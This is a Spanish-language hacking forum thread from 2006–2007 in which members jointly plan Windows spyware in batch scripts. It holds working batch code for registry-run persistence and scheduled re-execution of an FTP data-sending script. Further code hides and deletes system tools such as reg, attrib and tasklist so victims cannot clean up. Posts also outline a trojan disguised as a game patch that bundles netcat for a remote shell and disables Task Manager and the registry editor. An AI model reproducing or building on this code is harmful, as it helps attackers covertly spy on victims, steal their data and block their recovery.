|Proyecto| | Crear un Spyware entre Todos!!! |

-ZeR0™-
SeRiaL KiLLeR
Gran Colaborador

Desconectado

Mensajes: 1088

HaCkIng & SeCuRiTy

|Proyecto| | Crear un Spyware entre Todos!!! |

« en: Diciembre 28, 2006, 01:13:28 »


	En línea

Hardware Info

*S.O: MS Windows XP Professional SP2
*Procesador: AMD Duron
*Placa base: PCChips M810LR

*Memoria RAM: SdRam (2 X 128Mb)
*Tarjeta Gráfica: SIS300/305/630/540/730

*Regrabador: LITE-ON DVDRW SOHW-1673S
*Disco Duro: Maxtor 6 E040L0

Hendrix
Visitante

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #1 en: Diciembre 28, 2006, 01:27:33 »

En este subforo teneis kasi todos los kodigos ke pides, mi Generador de Worms hace casi todo esto... Undecided

Podeis kojer codigo de el... Wink

Salu2


	En línea

-ZeR0™-
SeRiaL KiLLeR
Gran Colaborador

Desconectado

Mensajes: 1088

HaCkIng & SeCuRiTy

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #2 en: Diciembre 28, 2006, 02:06:41 »

Gracias man, pero quiero hacer el proyecto, sin ningun programa, todos juntos. Hasi Aprendemos Mas Wink

Un saludo!


	En línea

acro_72
Visitante

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #3 en: Diciembre 30, 2006, 03:50:53 »

O.k Aunke ya a habido muchos proyectos de estos y nunca se terminan esperemos este si..Me uno....

Código:

@echo off
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "acro" /T REG_SZ /D "c:\acro.bat" /F

set h=%TIME:~0,2%
set m=%time:~3,2%
if %h%==23 goto code
set /a h=%h%+1
goto code1

:code
set h=00

:code1
AT %h%:%m% /every:L,M,Mi,J,V,S,D cmd /c start c:\bat-manda-info-ftp.bat
start c:\bat-manda-info-ftp.bat
exit

Entonces este bat ejecutara otro bat que manda info al ftp pero ademas programara a una hora para volvera ejecutarlo
obvio que el bat que manda info a la ftp tambien tiene este code para ejecutarse a otra hora despues y asi se la va a ir llevando.
falta programar el bat-manda-info-ftp.bat ovbio no se va a llamar asi es solo un ejemplo.


	En línea

-ZeR0™-
SeRiaL KiLLeR
Gran Colaborador

Desconectado

Mensajes: 1088

HaCkIng & SeCuRiTy

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #4 en: Diciembre 30, 2006, 04:20:05 »

Bien men, pues entonces, quieres entrarte dentro del Proyecto?


	En línea

acro_72
Visitante

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #5 en: Diciembre 30, 2006, 08:08:18 »

Si, Espero y apollen.


	En línea

N3gD4�
Miembro

Desconectado

Mensajes: 84

Scripter Batch

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #6 en: Diciembre 31, 2006, 05:56:41 »

me apunto


	En línea

-ZeR0™-
SeRiaL KiLLeR
Gran Colaborador

Desconectado

Mensajes: 1088

HaCkIng & SeCuRiTy

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #7 en: Diciembre 31, 2006, 07:08:11 »


	En línea

Sh4k4
.
Colaborador

Desconectado

Mensajes: 565

SHAKA

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #8 en: Enero 01, 2007, 04:00:50 »

para la infection del zip yo uso un portable executor ya sea del w1n zipo w1nrar asi van infectando los archivos aunque no anden instalados los compresores... pero tiene a veces sus limitantes.. cosa de calibrar... hom! Cool


	En línea

Arayashiki

The lord of the death
Recien Llegado

Desconectado

Mensajes: 19

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #9 en: Enero 01, 2007, 07:41:18 »


	En línea

biruwon
La diferencia entre el bien y el mal soy yo...
Habitual

Desconectado

Mensajes: 336

Proyecto Biruba

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #10 en: Enero 02, 2007, 07:09:11 »

Citar

Eso es para desactivar teclado y cambiar los botones del mouse o tambien esto

el proposito de un spyware es recopilar informacion no?si le desactivas el teclado no sera tan facil recopilar la informacion creo...

salu2


	En línea

Espectro Infernal
T0 d0: -> Mejorar 3 en raya
Moderadores
Gran Colaborador

Desconectado

Mensajes: 1024

ESPECTRO INFERNAL

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #11 en: Enero 02, 2007, 03:31:40 »


	En línea

-ZeR0™-
SeRiaL KiLLeR
Gran Colaborador

Desconectado

Mensajes: 1088

HaCkIng & SeCuRiTy

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #12 en: Enero 02, 2007, 05:27:11 »


	En línea

|Shadow|
Dein Nulls
Moderadores
Colaborador

Desconectado

Mensajes: 915

Fucking mnemonic c0d1n6!

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #13 en: Enero 07, 2007, 10:10:06 »

Bueno me apunto....
Aqui les dejo una parte de un tuto q ice

Podriamos acer q el ususario de una pc infectada no pueda tener acceso a comandos como: reg, attrib, tasklist, etc; pero que nuestro virus si lo pueda hacer

Como todos sabemos, los comandos son programas que se encuentran en un directorio especifico que son ejecutados desde un interprete. Pues esta es la base del principio.

Tomemos como ejemplo las funciones del virus:
-Se agrega al registro de inicio
-Desabilita el admin. de tareas
-Desabilita el editor de regs.
-Se esconde ocultandose como .bat en el c:\windows\system32\virus.bat

Un usuario avanzado que alla sido infectado con esto, solo tiene q abrir cmd y usar el comando reg para volver a abilitar todo; y usar el comando attrib para ver los archivos ocultos en sus directorios....pero como acemos para que ese usuario no tenga acceso a esos comandos?

Un ejemplo simple:
---------------------------------------------------------------------
set dir1=c:\windows\system32
set dir2=C:\WINDOWS\system32\drivers\etc
set kill=del /S /Q

:inst
copy /y %dir1%\attrib.exe %dir2%\host01.exe
copy /y %dir1%\reg.exe %dir2%\host02.exe
copy /y %dir1%\tasklist.exe %dir2%\host03.exe
copy /y %dir1%\debug.exe %dir2%\host04.exe
%kill% %dir1%\attrib.exe
%kill% %dir1%\reg.exe
%kill% %dir1%\tasklist.exe
%kill% %dir1%\debug.exe
------------------------------------------------------------

Creo que el code no necesita mas explicacion solo q, al momento de que el virus tenga que usar el comando attrib para ocultarse no acemos esto:

attrib c:\virus.bat +h +r

sino

%dir2%\host01.exe c:\virus.bat +h +r

Espero q la idea sirva de algo.......

Saludos Cool


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Reglamento del Foro

Linux Registered User #473016

acro_72
Visitante

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #14 en: Enero 08, 2007, 01:35:31 »


	En línea

acro_72
Visitante

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #15 en: Enero 08, 2007, 01:37:34 »

Buena Idea De Espectro.!!
Tambien Podemos Hacer Otro Bat Que Compruebe Si Existe El Spyware, Si No Existe Lo Baje del Ftp.
Saludos.


	En línea

|Shadow|
Dein Nulls
Moderadores
Colaborador

Desconectado

Mensajes: 915

Fucking mnemonic c0d1n6!

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #16 en: Enero 08, 2007, 05:22:39 »


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Reglamento del Foro

Linux Registered User #473016

|Shadow|
Dein Nulls
Moderadores
Colaborador

Desconectado

Mensajes: 915

Fucking mnemonic c0d1n6!

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #17 en: Enero 08, 2007, 05:58:49 »

Bueno, otra cosa podria ser tambien que el spyware este dentro de un comprimidido junto con sus demas archivos ocultos... y todos sean .exe..... creo que me explico mejor con un ejemplo...:

por ejemplo:

Tenemos un .rar con el nombre de "Starcraft patch v2.5" dentro de este tenemos un solo archivo visible, el "SC Patch v2.5.exe" ademas de el "saver.exe" oculto; el "nc.exe" oculto; el "send.exe" oculto y el "troy.exe" oculto.

Cuando el usuario ejecuta el "SC Patch v2.5.exe" se copian todos estos archivos en el %windir%, con el comando: copy *.exe %windir%\ . La funcion del "saver.exe" es, como propone acro_72, verificar si estos archivos estan en su lugar, y si no pues lo baja del ftp. El troy.exe es el archivo que abre una shell, claro que este programa es dependiente del nc.exe .El "send.exe" es el bucle que se encarga de mandar la informacion al ftp. Como se supone, el "SC Patch v2.5.exe" se renombra, se agrega al registro junto con los demas archivos, y ejecuta las principales funciones del Spyware.

Por que tantos archivos separador? pues por la sencilla razon de que un spyware debe estar TOTALMENTE oculto al ojo de la victima, y si este ve consolas cmd abiertas podria ser mucha sospecha. pero claro q se deben desabilitar todas las posibles formas de que el usuario pueda "matar" los procesos sospechosos del spyware, esto implica: desabilitar el admin. de tareas, desabilitar el edit. de regs., desabilitar los comandos:taskkill, reg, tasklist (para esto puse mi mensaje anterior), etc, etc

Saludos Cool


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Reglamento del Foro

Linux Registered User #473016

acro_72
Visitante

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #18 en: Enero 09, 2007, 12:51:53 »


	En línea

|Shadow|
Dein Nulls
Moderadores
Colaborador

Desconectado

Mensajes: 915

Fucking mnemonic c0d1n6!

Re: |Proyecto| | Crear un Spyware entre Todos!!! |

« Respuesta #19 en: Enero 10, 2007, 03:09:35 »


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Reglamento del Foro

Linux Registered User #473016

Páginas: [1]

Comunidad Underground Hispana \| Programacion \| Programación \| Batch (Moderadores: Espectro Infernal, \|Shadow\|) \| Tema: \|Proyecto\| \| Crear un Spyware entre Todos!!! \|	« anterior próximo »

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Noviembre 18, 2008, 06:35:02